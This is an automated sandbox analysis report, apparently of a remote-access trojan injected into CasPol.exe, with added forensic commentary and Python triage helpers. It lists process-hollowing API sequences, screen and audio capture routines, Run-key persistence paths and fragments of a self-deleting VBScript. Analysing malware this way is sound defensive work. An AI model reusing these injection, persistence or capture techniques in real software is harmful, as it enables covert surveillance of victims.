• Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
• Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetIconInfo.USER32 ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
• GetObjectA.GDI32(?,00000018,?), ref: 00418173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• DeleteDC.GDI32(00000000), ref: 00418282
• DeleteObject.GDI32(00000000), ref: 00418285
• GlobalFree.KERNEL32(00CC0020), ref: 00418290
• DeleteObject.GDI32(00000000), ref: 00418344
• GlobalFree.KERNEL32(?), ref: 0041834B
• DeleteDC.GDI32(?), ref: 0041835B
• DeleteDC.GDI32(00000000), ref: 00418366
• DeleteDC.GDI32(?), ref: 00418398
• DeleteDC.GDI32(00000000), ref: 0041839B
• DeleteObject.GDI32(?), ref: 004183A1
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1765752176-865373369
• Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
• Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
• Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
• Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32 ref: 004173C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• WriteProcessMemory.KERNEL32 ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 4188446516-3035715614
• Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
• Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
• PathFileExistsW.SHLWAPI(?), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000), ref: 0041B5FF
  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
• OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
• CloseHandle.KERNEL32(00000000), ref: 004114EB
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
• API String ID: 4250697656-2665858469
• Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
• Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
• Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
• Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32 ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-3168347843
• Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
• Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
• Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
• Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                              APIs
                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32 ref: 0040AFD5
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                              • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                              • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
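The two functions above share the same shape: terminate the keyboard-hook and worker threads (TerminateThread, UnhookWindowsHookEx), delete the HKCU (0x80000001) Run and Policies\Explorer\Run persistence values (RegDeleteKeyA), reset the payload's attributes to FILE_ATTRIBUTE_NORMAL (SetFileAttributesW with 0x80), drop a VBScript under %TEMP% (the update.vbs string), launch it with ShellExecuteW and ExitProcess. The String IDs give the statements of that script: a `while fso.FileExists(...)` loop that keeps deleting the executable until the process is gone, a folder delete, and `fso.DeleteFile(Wscript.ScriptFullName)` so the script removes itself. The following Python is an added triage helper, not code from the report or from the sample: it checks a recovered .vbs for that statement combination and pulls out the paths it targets. The sample script is constructed from the listed fragments; its line order and the path it points at are assumptions.

```python
import re

# Constructed sample in the shape the String IDs above describe (an "update.vbs"
# written to %TEMP%). Statement order and the C:\ProgramData path are assumed.
SAMPLE_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\ProgramData\remcos\remcos.exe")
fso.DeleteFile "C:\ProgramData\remcos\remcos.exe"
wend
fso.DeleteFolder "C:\ProgramData\remcos"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Each marker is one of the fragments in the String ID list. The wait loop plus
# the self-delete is what separates an uninstall stub from an ordinary script.
PATTERNS = {
    "fso":         re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "wait_loop":   re.compile(r'while\s+fso\.FileExists\("([^"]+)"\)', re.I),
    "delete_file": re.compile(r'fso\.DeleteFile\s+"([^"]+)"', re.I),
    "delete_dir":  re.compile(r'fso\.DeleteFolder\s+"([^"]+)"', re.I),
    "self_delete": re.compile(r'fso\.DeleteFile\(Wscript\.ScriptFullName\)', re.I),
}


def analyse_vbs(text: str) -> dict:
    """Report which uninstall-stub markers a script contains and the paths it touches.

    Returns a dict with the overall verdict, a per-marker hit map and the sorted
    list of file/folder paths named in the wait loop and delete statements.
    """
    hits = {name: bool(rx.search(text)) for name, rx in PATTERNS.items()}
    targets = set()
    for name in ("wait_loop", "delete_file", "delete_dir"):
        targets.update(PATTERNS[name].findall(text))
    verdict = hits["fso"] and hits["wait_loop"] and hits["self_delete"]
    return {"is_uninstall_stub": verdict, "markers": hits, "targets": sorted(targets)}


if __name__ == "__main__":
    result = analyse_vbs(SAMPLE_VBS)
    print("uninstall stub:", result["is_uninstall_stub"])
    for path in result["targets"]:
        print("  targets", path)
```

The paths the helper returns are the ones worth confirming on disk and in the two Run keys named above; because the script only loops while the executable still exists, an unfinished stub left in %TEMP% usually means the payload process was still running when the host was imaged.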
                                                                                                              APIs
                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041A2FF
                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                              • API String ID: 738084811-1408154895
                                                                                                              • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                              • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Write$Create
                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
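The thirteen WriteFile calls above have sizes 4,4,4,4,4,2,2,4,4,2,2,4,4: exactly the canonical 44-byte PCM WAV header (RIFF, chunk size, WAVE, "fmt ", 16, format tag, channels, sample rate, byte rate, block align, bits per sample, "data", data size). The pointer arguments 00471B02, 00471B04 and 00471B0E are 2, 4 and 2 bytes apart in the order a WAVEFORMATEX is laid out, which is consistent with the routine serialising a static format structure in .data; the mciSendString function listed before it opens and plays such a file. The Python below is an added example (not the report's or the sample's code) that writes the header in the same thirteen-field order, validates one, and carves every such header out of a raw blob, which is how a recording written this way can be recovered from a memory dump or unallocated space.

```python
import struct

FIELD_SIZES = [4, 4, 4, 4, 4, 2, 2, 4, 4, 2, 2, 4, 4]  # the 13 WriteFile lengths above


def build_wav_header(channels, sample_rate, bits_per_sample, data_len, format_tag=1):
    """Emit the 44-byte PCM header as 13 fields in the same order as the routine."""
    block_align = channels * bits_per_sample // 8
    byte_rate = sample_rate * block_align
    fields = [
        b"RIFF",
        struct.pack("<I", 36 + data_len),   # RIFF size = 4 ("WAVE") + 24 (fmt chunk) + 8 + data
        b"WAVE",
        b"fmt ",
        struct.pack("<I", 16),              # fmt chunk size for plain PCM
        struct.pack("<H", format_tag),      # 1 = WAVE_FORMAT_PCM
        struct.pack("<H", channels),
        struct.pack("<I", sample_rate),
        struct.pack("<I", byte_rate),
        struct.pack("<H", block_align),
        struct.pack("<H", bits_per_sample),
        b"data",
        struct.pack("<I", data_len),
    ]
    assert [len(f) for f in fields] == FIELD_SIZES
    return b"".join(fields)


def parse_wav_header(blob):
    """Validate a canonical header and return its fields, or None if it is not one."""
    if len(blob) < 44 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE" or blob[12:16] != b"fmt ":
        return None
    fmt_size, tag, ch, rate, byte_rate, align, bits = struct.unpack("<IHHIIHH", blob[16:36])
    if fmt_size != 16 or blob[36:40] != b"data":
        return None
    data_len = struct.unpack("<I", blob[40:44])[0]
    return {
        "format_tag": tag, "channels": ch, "sample_rate": rate, "byte_rate": byte_rate,
        "block_align": align, "bits_per_sample": bits, "data_len": data_len,
        "duration_s": data_len / byte_rate if byte_rate else 0.0,
    }


def carve_wavs(blob):
    """Return (offset, header) for every canonical WAV header found in a raw blob."""
    found = []
    pos = blob.find(b"RIFF")
    while pos != -1:
        hdr = parse_wav_header(blob[pos:pos + 44])
        if hdr:
            found.append((pos, hdr))
        pos = blob.find(b"RIFF", pos + 1)
    return found


if __name__ == "__main__":
    # Constructed blob: one second of mono 16-bit audio and a second short file.
    sample = b"\x00" * 7 + build_wav_header(1, 44100, 16, 88200) + b"\x11" * 88200
    sample += build_wav_header(2, 8000, 8, 16) + b"\x22" * 16
    for offset, hdr in carve_wavs(sample):
        print(f"WAV at {offset}: {hdr['channels']} ch, {hdr['sample_rate']} Hz, {hdr['duration_s']:.2f} s")
```

The carver only trusts a header whose fmt chunk is exactly 16 bytes and whose "data" tag sits at offset 36, which is the only layout this writer can produce; recordings produced by other tools may carry extra chunks and need a general RIFF walker instead.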
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                              • API String ID: 1646373207-165202446
                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                              APIs
                                                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                              • CopyFileW.KERNEL32 ref: 0040BD3E
                                                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                              • CopyFileW.KERNEL32 ref: 0040BDF2
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                              • CloseHandle.KERNEL32 ref: 0040BE9B
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                              • API String ID: 1579085052-1280438975
                                                                                                              • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                              • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
